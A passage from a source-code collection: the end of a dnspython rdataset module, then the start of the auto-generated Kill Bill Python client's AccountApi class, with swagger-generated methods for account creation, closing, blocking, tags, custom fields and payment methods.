r = Rdataset(rd.rdclass, rd.rdtype)
r.update_ttl(ttl)
first_time = False
r.add(rd)
return r
def from_rdata(ttl, *rdatas):
"""Create an rdataset with the specified TTL, and with
the specified rdata objects.
@rtype: dns.rdataset.Rdataset object
"""
return from_rdata_list(ttl, rdatas)
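# Illustrative usage of the module-level helpers above (a sketch, not part of
# the library); the addresses are placeholders.
def _example_rdataset_usage():
    rs = from_text('IN', 'A', 3600, '10.0.0.1', '10.0.0.2')
    # the rdataset matches its own class/type and covers nothing
    assert rs.match(dns.rdataclass.IN, dns.rdatatype.A, dns.rdatatype.NONE)
    return rs.to_text()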
|
gpl-3.0
| 7,146,983,658,648,308,000
| 34.279635
| 78
| 0.591023
| false
| 4.012098
| false
| false
| false
|
killbill/killbill-client-python
|
killbill/api/account_api.py
|
1
|
210059
|
# coding: utf-8
#
# Copyright 2010-2014 Ning, Inc.
# Copyright 2014-2020 Groupon, Inc
# Copyright 2020-2021 Equinix, Inc
# Copyright 2014-2021 The Billing Project, LLC
#
# The Billing Project, LLC licenses this file to you under the Apache License, version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Kill Bill
Kill Bill is an open-source billing and payments platform # noqa: E501
OpenAPI spec version: 0.22.22-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from killbill.api_client import ApiClient
class AccountApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_account_blocking_state(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Block an account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_account_blocking_state(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param BlockingState body: (required)
:param Str created_by: (required)
:param Date requested_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_account_blocking_state_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.add_account_blocking_state_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def add_account_blocking_state_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Block an account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_account_blocking_state_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param BlockingState body: (required)
:param Str created_by: (required)
:param Date requested_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'requested_date', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_account_blocking_state" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `add_account_blocking_state`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_account_blocking_state`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `add_account_blocking_state`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `add_account_blocking_state`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'requested_date' in params:
query_params.append(('requestedDate', params['requested_date'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/block', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[BlockingState]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_email(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add account email # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_email(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param AccountEmail body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_email_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.add_email_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def add_email_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add account email # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_email_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param AccountEmail body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_email" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `add_email`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_email`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `add_email`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `add_email`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AccountEmail]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def close_account(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Close account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.close_account(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Bool cancel_all_subscriptions:
:param Bool write_off_unpaid_invoices:
:param Bool item_adjust_unpaid_invoices:
:param Bool remove_future_notifications:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.close_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.close_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def close_account_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Close account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.close_account_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Bool cancel_all_subscriptions:
:param Bool write_off_unpaid_invoices:
:param Bool item_adjust_unpaid_invoices:
:param Bool remove_future_notifications:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'cancel_all_subscriptions', 'write_off_unpaid_invoices', 'item_adjust_unpaid_invoices', 'remove_future_notifications', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method close_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `close_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `close_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `close_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'cancel_all_subscriptions' in params:
query_params.append(('cancelAllSubscriptions', params['cancel_all_subscriptions'])) # noqa: E501
if 'write_off_unpaid_invoices' in params:
query_params.append(('writeOffUnpaidInvoices', params['write_off_unpaid_invoices'])) # noqa: E501
if 'item_adjust_unpaid_invoices' in params:
query_params.append(('itemAdjustUnpaidInvoices', params['item_adjust_unpaid_invoices'])) # noqa: E501
if 'remove_future_notifications' in params:
query_params.append(('removeFutureNotifications', params['remove_future_notifications'])) # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account(self, body=None, created_by=None, **kwargs): # noqa: E501
"""Create account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account(body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Account body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_account_with_http_info(body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_account_with_http_info(body, created_by, **kwargs) # noqa: E501
return data
def create_account_with_http_info(self, body=None, created_by=None, **kwargs): # noqa: E501
"""Create account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_with_http_info(body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Account body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_account`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
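# Illustrative client usage (a sketch; only ApiClient's import path is taken
# from this file, the rest is an assumption about the generated client):
#
#   from killbill.api_client import ApiClient
#   api = AccountApi(ApiClient())
#   new_account = api.create_account(body=account_body, created_by='demo')
#
# where account_body is an instance of the generated Account model.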
def create_account_custom_fields(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_custom_fields(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def create_account_custom_fields_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_custom_fields_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `create_account_custom_fields`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_account_custom_fields`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `create_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[CustomField]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_tags(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add tags to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_tags(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_account_tags_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_account_tags_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def create_account_tags_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add tags to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_tags_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `create_account_tags`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_account_tags`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_account_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `create_account_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/tags', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Tag]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_payment_method(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add a payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_payment_method(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentMethod body: (required)
:param Str created_by: (required)
:param Bool is_default:
:param Bool pay_all_unpaid_invoices:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: PaymentMethod
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_payment_method_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_payment_method_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def create_payment_method_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add a payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_payment_method_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentMethod body: (required)
:param Str created_by: (required)
:param Bool is_default:
:param Bool pay_all_unpaid_invoices:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: PaymentMethod
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'is_default', 'pay_all_unpaid_invoices', 'control_plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_payment_method" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `create_payment_method`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_payment_method`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_payment_method`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `create_payment_method`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'is_default' in params:
query_params.append(('isDefault', params['is_default'])) # noqa: E501
if 'pay_all_unpaid_invoices' in params:
query_params.append(('payAllUnpaidInvoices', params['pay_all_unpaid_invoices'])) # noqa: E501
if 'control_plugin_name' in params:
query_params.append(('controlPluginName', params['control_plugin_name'])) # noqa: E501
collection_formats['controlPluginName'] = 'multi' # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PaymentMethod', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_custom_fields(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove custom fields from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_custom_fields(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] custom_field:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_account_custom_fields_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.delete_account_custom_fields_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def delete_account_custom_fields_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove custom fields from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_custom_fields_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] custom_field:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'custom_field', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_custom_fields`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `delete_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `delete_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'custom_field' in params:
